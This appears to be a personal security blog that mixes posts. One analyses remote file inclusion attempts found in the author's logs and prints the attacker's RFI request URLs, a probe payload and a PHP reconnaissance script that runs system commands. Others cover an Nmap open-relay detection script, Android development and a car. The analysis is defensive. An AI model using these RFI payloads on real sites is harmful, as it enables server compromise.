myf00

I have started developing for Android a month and an half ago. Developing for Android can be described in two words, simple and smooth. The developing language is Java, and even though, the company were I work mainly develops in Java, I consider it to be fairly simple to start developing. The IDE is an Eclipse plug-in, that all in all suits the needs of the developer. It integrates very well with the ADT (Android Development Tools). Even, when running in a 64 bits development machine (the tools are for 32 bits), the emulator and the ADB (Android Debug Bridge Daemon) worked flawlessly. The only criticism that I can find is the fact that the emulator stays a little bit on the slow side of things, at least when compared to a real device.

For that reason and the fact that the device can be more picky when it comes down to memory, I recommend the usage of a real device from day one.

And by the way, this my fist post from the Wordpress Android application ;).

For a month that I have been tracking down the requests that are made to my site, looking at the logs I was able to find fourteen attack attempts. The attempts originated from the following IP addresses.

41.204.218.*
58.150.99.*
210.116.103.*

The requests made in the attempts were crafted to test for remote file inclusions.

/contrib/yabbse/poc.php?poc_root_path=http://*******.kr/~eco-max/gboard/lib/id1.txt
/include/admin.lib.inc.php?site_path=http://*******.co.za/content_old/themes/a.txt?

The two files, a.txt and id1.txt, used in the requests boiled down to

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

When executed by PHP the output would contain only FeeLCoMzFeeLCoMz which is a easy way for the attacker to verify that the site is vulnerable to remote file inclusions.

After checking the IP addresses from were the requests originated, I wasn't surprised when I found out they came from the compromised sites that hosted the files. In one of the compromised sites, I was able to list the contents of the directory that contained the id1.txt file.

In that directory there were present files that indicated there were made attempts to exploit local privilege escalation vulnerabilities in Linux, some PERL scripts that connect to an IRC server (which isn't available any more) in order to receive orders and two Python scripts.

# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : 2.6.18 2008 Exploit's İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL

#define _GNU_SOURCE
#include <stdio.h>
(...)

#!/usr/bin/perl

print('
########################################
## LoDoyo Scanner Bot v9.1            ##
## By Special Edition By LoDoYo       ##
## ? NOV-Des 2009, NKN - TeaM         ##
########################################
');
######################################################
## Usage:                                           ##
##   perl lodoyocrew.pl <chan w/o #> <server> <port>##
(...)

There were also present some text files that are simple log files of the requests made to other sites. Many of the sites that I was able to identify in those log files didn't host, at least not any more, the files belonging to the id1.txt family. This is a good thing since it will reduce the attack effectiveness. In those files there were also present requests made in order to find log files and AWStats report pages.

I picked eight of those requests and was able to download the access log files for five sites. In those access log files I found a lot of requests that belonged to the same family as the ones made to myf00.

After hacking up a Python script, the logs yielded 289199 requests in total that originated from 1612 unique IP addresses. There were a total of 132 SQL injection attempts, 2082 directory transversal's, 251872 remote file inclusion attempts. It can also be accounted that there are 154 hosts that still host files of the id1.txt family.

There is also some web shells in the list as well as some variations of the id1.txt file family that print some server related information when invoked in a remote file inclusion scenario.

<?
echo "Coracore<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "Coracore is my BoyFriend<br>";
exit;
?>

My first contribution to the Nmap project was accepted!! It feels good to be able to contribute to such a tool. To get more information in all the process, checkout the SecLists.Org mailing list archive here and here You can checkout the script from the Nmap SVN repository or copy the code bellow.

description = [[
Attempts to relay mail by issuing a predefined combination of SMTP commands. The goal
of this script is to tell if a SMTP server is vulnerable to mail relaying.

An SMTP server that works as an open relay, is a email server that does not verify if the
user is authorised to send email from the specified email address. Therefore, users would
be able to send email originating from any third-party email address that they want.

The checks are done based in combinations of MAIL FROM and RCPT TO commands. The list is
hardcoded in the source file. The script will output all the working combinations that the
server allows, or none if the server requires authentication or if there wasn't any working
combinations.
]]

---
-- @usage
-- nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=<domain>,smtp-open-relay.ip=<address>] -p 25,465,587 <host>
--
-- @output
-- Host script results:
-- | smtp-open-relay:
-- |   MAIL FROM:<antispam@[10.0.1.2]> -> RCPT TO:<"relaytest@nmap.scanme.org">
-- |   MAIL FROM:<antispam@[10.0.1.2]> -> RCPT TO:<"relaytest%nmap.scanme.org">
-- |_  MAIL FROM:<antispam@[10.0.1.2]> -> RCPT TO:<nmap.scanme.org!relaytest>
--
-- @args smtp-open-relay.domain Define the domain to be used in the anti-spam tests (default is nmap.scanme.org)
-- @args smtp-open-relay.ip Use this to change the IP address to be used (default is the target IP address)
--
-- @changelog
-- 2007-05-16 Arturo 'Buanzo' Busleiman <buanzo@buanzo.com.ar>
--   + Added some strings to return in different places
--   * Changed "HELO www.[ourdomain]" to "EHLO [ourdomain]"
--   * Fixed some API differences
--   * The "ourdomain" variable's contents are used instead of hardcoded "insecure.org". Settable by the user.
--   * Fixed tags -> categories (reported by Jason DePriest to nmap-dev)
-- 2009-09-20 Duarte Silva <duarte.silva@myf00.net>
--   * Rewrote the script
--   + Added documentation and some more comments
--   + Parameter to define the domain to be used instead of "ourdomain" variable
--   + Parameter to define the IP address to be used instead of the target IP address
--   * Script now detects servers that enforce authentication
--   * Changed script categories from demo to discovery and intrusive
--   * Renamed "spamtest" strings to "antispam"
-- 2010-02-20 Duarte Silva <duarte.silva@myf00.net>
--   * Renamed script parameters to follow the new naming convention
--   * Fixed problem with broken connections
--   * Changed script output to show all the successful tests
--   * Changed from string concatenation to string formatting
--   + External category
--   + Now the script will issue the QUIT message as specified in the SMTP RFC
-- 2010-02-27 Duarte Silva <duarte.silva@myf00.net>
--   + More information in the script description
--   + Script will output the reason for failed commands (at the connection level)
--   * If some combinations were already found before an error, the script will report them
-----------------------------------------------------------------------

author = "Arturo 'Buanzo' Busleiman <buanzo@buanzo.com.ar>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery","intrusive","external"}

require "shortport"
require "comm"

portrule = shortport.port_or_service({ 25, 465, 587 }, { "smtp", "smtps", "submission" })

---Send a command and read the response (this function does exception handling, and if an
-- exception occurs, it will close the socket).
--
--@param socket Socket used to send the command
--@param request Command to be sent
--@return False in case of failure
--@return True and the response in case of success
function dorequest(socket, request)
	-- Exception handler
	local catch = function()
		socket:close()
	end
	-- Try function
	local try = nmap.new_try(catch)

	-- Lets send the command
	try(socket:send(request))
	-- Receive server response
	local status, response = socket:receive_lines(1)

	if not status then
		local messages = {
			["EOF"] = "connection closed",
			["TIMEOUT"] = "connection timeout",
			["ERROR"] = "failed to receive data"
		}

		return false, (messages[response] or "unspecified error, for more information use --script-trace")
	end

	return true, response
end

function go(host, port)
	local domain = "nmap.scanme.org"
	local ip = host.ip
	local socket = nmap.new_socket()
	local options = {
		timeout = 10000,
		recv_before = true
	}

	socket:set_timeout(5000)

	-- Be polite and when everything works out send the QUIT message.
	local quit = function()
		dorequest(socket, "QUIT\r\n")
		socket:close()
	end

	-- Use the user provided options.
	if (nmap.registry.args["smtp-open-relay.domain"] ~= nil) then
		domain = nmap.registry.args["smtp-open-relay.domain"]
	end

	if (nmap.registry.args["smtp-open-relay.ip"] ~= nil) then
		ip = nmap.registry.args["smtp-open-relay.ip"]
	end

	-- Try to connect to server.
	local response

	socket, response = comm.tryssl(host, port, string.format("EHLO %s\r\n", domain), options)

	if not socket then
		return false, string.format("Couldn't establish connection on port %i", port.number)
	end

	-- Close socket and return if EHLO command failed
	if not string.match(response, "^250") then
		quit()
		return false, "Failed to issue EHLO command"
	end

	-- Find out server name.
	local srvname = string.sub(response, string.find(response, '([.%w]+)', 4))

	-- Antispam tests.
	local tests = {
		{ from = "MAIL FROM:<>", to = string.format("RCPT TO:<relaytest@%s>", domain) },
		{ from = string.format("MAIL FROM:<antispam@%s>", domain), to = string.format("RCPT TO:<relaytest@%s>", domain) },
		{ from = string.format("MAIL FROM:<antispam@%s>", srvname), to = string.format("RCPT TO:<relaytest@%s>", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest@%s>", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest%%%s@[%s]>", domain, ip) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest%%%s@%s>", domain, srvname) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<\"relaytest@%s\">", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<\"relaytest%%%s\">", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest@%s@[%s]>", domain, ip) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<\"relaytest@%s\"@[%s]>", domain, ip) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest@%s@%s>", domain, srvname) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<@[%s]:relaytest@%s>", ip, domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<@%s:relaytest@%s>", srvname, domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<%s!relaytest>", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<%s!relaytest@[%s]>", domain, ip) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<%s!relaytest@%s>", domain, srvname) },
	}

	local result = {}
	local index
	local status

	-- This function is used when something goes wrong with the connection. It makes sure that
	-- if it found working combinations before the error occurred, they will be returned.
	local failure = function(message)
		if #result > 0 then
			return true, result
		else
			return false, message
		end
	end

	for index = 1, table.getn(tests), 1 do
		status, response = dorequest(socket, "RSET\r\n")

		if not status then
			return failure(string.format("Failed to issue RSET command (%s)", response))
		end

		-- If reset the envelope, doesn't work for one, wont work for others (critical command).
		if not string.match(response, "^250") then
			quit()
			-- Check if server needs authentication.
			if string.match(response, "^530") then
				return false, "Server isn't an open relay, authentication needed"
			else
				return false, "Unable to clear server envelope"
			end
		end

		-- Lets try to issue MAIL FROM command.
		status, response = dorequest(socket, string.format("%s\r\n", tests[index]["from"]))

		-- If this command fails to be sent, then something went wrong with the connection.
		if not status then
			return failure(string.format("Failed to issue %s command (%s)", tests[index]["from"], response))
		end

		-- If MAIL FROM failed, check if authentication is needed because all the other attempts will fail
		-- and server may disconnect because of too many commands issued without authentication.
		if string.match(response, "^530") then
			quit()
			return false, "Server isn't an open relay, authentication needed"
		-- The command was accepted (otherwise, the script will step to the next test).
		elseif string.match(response, "^250") then
			-- Lets try to actually relay.
			status, response = dorequest(socket, string.format("%s\r\n", tests[index]["to"]))

			if not status then
				return failure(string.format("Failed to issue %s command (%s)", tests[index]["to"], response))
			end

			if string.match(response, "^530") then
				quit()
				return false, "Server isn't an open relay, authentication needed"
			elseif string.match(response, "^250") then
				-- Save the working from and to combination.
				table.insert(result, string.format("%s - > %s", tests[index]["from"], tests[index]["to"]))
			end
		end
	end

	quit()
	return true, result
end

action = function(host, port)
	local status, result = go(host, port)

	-- No combinations found
	if #result == 0 then
		return stdnse.format_output(false, "All tests failed, server doesn't seem to be an open relay")
	end

	return stdnse.format_output(status, result)
end

I’m a *fan boy*. and Honda *fan boy*. I can only describe the small Honda sport compact vehicles from 1995 to 1998 with one word, magic. Why is that? The feel of driving one is amazing, its like you are connected to the car. You feel the gears engaging, the clutch grabbing the flywheel and the throttle cable opening the plate, its that mechanic feeling that I can’t find in any other modern car in the same segment range as those *little* magic cars.

The one I drove was a Honda Civic 1.6 ESi. In it’s original form it is powered by a single sided VTEC SOHC that pushes 125 ponies. For the owner it wasn’t enough though, he decided to transplant the engine from the Honda Civic 1.6 VTI. Now with DOHC and true VTEC the car gained a new live. But the feeling, that mechanic feeling, was still there. Actually, it was only intensified by it’s new 160hp engine.

Many will argue that the torque is low, and it’s true, seriously it sucks. But a good driver that knows how to maintain the revolutions of the engine in the sky (8000rpm red-line eheheh) the car would simply fly. Sticking to the road thanks to its double wishbone suspension it handle curves like it was on rails.

Did I drive it like a maniac? No way in hell!!! I was so afraid of something happening to the car that even the owner was telling me to go faster!

And what about now? I look at the new Honda compact cars and I can’t actually call them sport even those that are supposed to be. Using cheaper suspensions and less emotional engines, I simply feel like Honda as lost is spirit, its racing spirit, that made what Honda was some ten years ago. My ecologist side, tells me that this is the way to go, with the econoboxes and their drive by wire systems. But my petrol head side tells me go the hell with that, I want emotion and feelings of satisfaction, driving satisfaction.

I’m human, and I’m bound to emotions by nature and that is why I don’t see myself buying an Honda vehicle any time soon, at least not like I did back in the days.

I also need to say thanks to Francisco aka ChlcO, for giving me the change to taste what Honda should be all about! Fly high my friend!

Just wanted to quote the following paragraph from Mika Tolvanen blog post in the F-Secure Weblog.

Today’s browser is more powerful than yesterday’s OS.

The browser is, for all practical purposes, a terminal of the bank, but it is running in a completely untrusted environment. Actually, you could say that the Browser is the new OS. Since important content is more and more in the cloud and accessed via the browser, malware, in theory, does not have to infect the OS at all. Malware only needs to infect the browser and it will be able to access, steal, and modify all the necessary content. Since most browsers have a cross-platform plugin architecture, it may even be possible to create data stealing malware that is not interested in the operating system or file system at all. It will only exist in memory of the browser.

This is totally my point of view related to browsers in terms of security. and that was what I tried to prove in my Firefox Malware PoC. Browsers really need to step up the game.